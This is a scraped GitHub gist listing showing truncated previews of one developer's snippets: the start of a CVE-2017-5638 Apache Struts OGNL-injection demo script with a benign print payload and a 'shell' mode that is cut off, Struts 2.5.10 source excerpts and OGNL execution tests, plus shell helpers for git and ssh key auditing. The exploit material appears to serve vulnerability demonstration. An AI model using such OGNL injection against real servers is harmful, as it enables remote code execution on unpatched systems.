Skip to content

Instantly share code, notes, and snippets.

View cve-2017-5638.sh
#!/bin/bash
set -euo pipefail
# write to output stream
payload="(@java.lang.System@out.println('\\n\\n\\n---[ hello Sqreeners ]---'))"
attack=${1:-hello}
if [[ 'shell' == "${attack}" ]]; then
@SylvainJuge
SylvainJuge / TestOgnl.java
Last active Jun 7, 2018
Struts 2.5.10 Ognl code execution with unit tests
View TestOgnl.java
package io.sqreen.sandbox;
import com.opensymphony.xwork2.ActionContext;
import com.opensymphony.xwork2.TextProvider;
import com.opensymphony.xwork2.XWorkTestCase;
import com.opensymphony.xwork2.conversion.impl.XWorkConverter;
import com.opensymphony.xwork2.ognl.OgnlUtil;
import com.opensymphony.xwork2.ognl.OgnlValueStack;
import com.opensymphony.xwork2.ognl.accessor.CompoundRootAccessor;
import com.opensymphony.xwork2.util.CompoundRoot;
@SylvainJuge
SylvainJuge / JakartaMultiPartRequest.java
Created Jun 7, 2018
Struts 2.5.10 JakartaMultiPartRequest
View JakartaMultiPartRequest.java
public void parse(HttpServletRequest request, String saveDir) throws IOException {
try {
setLocale(request);
processUpload(request, saveDir);
} catch (FileUploadException e) {
LOG.warn("Request exceeded size limit!", e);
LocalizedMessage errorMessage;
if(e instanceof FileUploadBase.SizeLimitExceededException) {
FileUploadBase.SizeLimitExceededException ex = (FileUploadBase.SizeLimitExceededException) e;
errorMessage = buildErrorMessage(e, new Object[]{ex.getPermittedSize(), ex.getActualSize()});
@SylvainJuge
SylvainJuge / FileUploadInterceptor.java
Created Jun 7, 2018
Struts 2.5.10 FileUploadInterceptor
View FileUploadInterceptor.java
// intercept(...) method from Struts 2.5.10
// https://github.com/apache/struts/blob/f0f4e9ece77000e0eb0071bf233ed4b9bc9c8205/core/src/main/java/org/apache/struts2/interceptor/FileUploadInterceptor.java#L264
public String intercept(ActionInvocation invocation) throws Exception {
ActionContext ac = invocation.getInvocationContext();
HttpServletRequest request = (HttpServletRequest) ac.get(ServletActionContext.HTTP_REQUEST);
if (!(request instanceof MultiPartRequestWrapper)) {
if (LOG.isDebugEnabled()) {
@SylvainJuge
SylvainJuge / git-add-bunny.sh
Last active Oct 7, 2016
prevent your colleagues from using "git add ."
View git-add-bunny.sh
# make your colleages stop using "git add ."
#
# you should put this into usual alias file .bashrc, .zshrc or whatever you use
# - make sure path to git executable fits your setup (here on linux/ubuntu)
# - increate timeout if symptoms persist
git() {
if [[ $@ == "add ." ]]; then
echo "you shall use 'git add -p instead'"
echo ' ,'
echo ' /| __'
View git current branch
#
# 1) add function to add to your ~/.profile or ~/.bashrc (or aliases) file
#
_current_branch () {
ref=$(git symbolic-ref HEAD 2>/dev/null) || head=$(git rev-parse --short HEAD 2>/dev/null)
echo ${ref#refs/heads/}
}
@SylvainJuge
SylvainJuge / sshaudit
Created Oct 17, 2013
simple "ssh audit" to see ssh keys fingerprints authorized on multiple servers at once usage : sshaudit server1 server2
View sshaudit
# ssh "audit" : see who accesses what
sshaudit (){
for server in "$@"; do
ssh $server -C 'cat ~/.ssh/authorized_keys' | sort | while read line; do
tmp="$(mktemp)"
echo "$line" > "$tmp"
echo $server $(ssh-keygen -lf "$tmp" | cut -d ' ' -f2,4)
rm -f "$tmp"
done
done